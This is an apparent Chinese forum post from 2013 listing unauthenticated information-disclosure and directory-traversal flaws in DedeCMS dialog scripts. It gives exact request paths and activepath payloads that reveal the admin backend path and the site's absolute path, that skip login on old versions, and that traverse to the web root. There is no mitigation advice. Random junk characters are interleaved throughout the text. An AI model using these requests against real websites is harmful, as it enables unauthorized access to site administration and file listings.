1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
- L- m$ K7 N0 O" x" S* v, l6 |/ B6 O' x7 [8 d6 U( e
员帐号,新版本的就直接转向了后台.- }; M* U( y3 y) S; \: C3 w9 O9 J: Q
) X+ R* J' y M! B8 ]
2.include/dialog/config.php会爆出后台管理路径
/ s" ^; y8 D( f8 G' f( j( z: L: F& q C. ~0 ~
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
. M' L9 o8 n- ]: |5 Q1 _+ Q4 H0 k# H" u- ^$ ?
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.& a, v/ e- [6 Z- ~' r% F; w9 z3 _
6 E7 C. d; x' t
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
' e: R' A- T( @) ?
9 P1 R" B) c0 v7 p4 J* [/ v到根目录去.不过这些版本的访问地址有些不同.
$ T0 [3 Y* U8 `; [地址为require/dialog/select_soft.php?activepath=/././././././././" A2 d8 z+ E) X: W( _
9 V3 H* ^$ T+ I+ b1 P$ K
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦.. W; p% c" c- A" t% }8 _7 y$ P
存在相同问题的文件还有! s% C: ~, R/ v. J
include\dialog\select_images.php
) g& ?* u9 y0 ~2 p& s5 ^0 Linclude\dialog\select_media.php
6 L. y3 m( g; f# y" r* [; Ainclude\dialog\select_templets.php {: k& C" P" C5 W% e
|
发表于 2013-4-16 16:50:43
收藏
支持
反对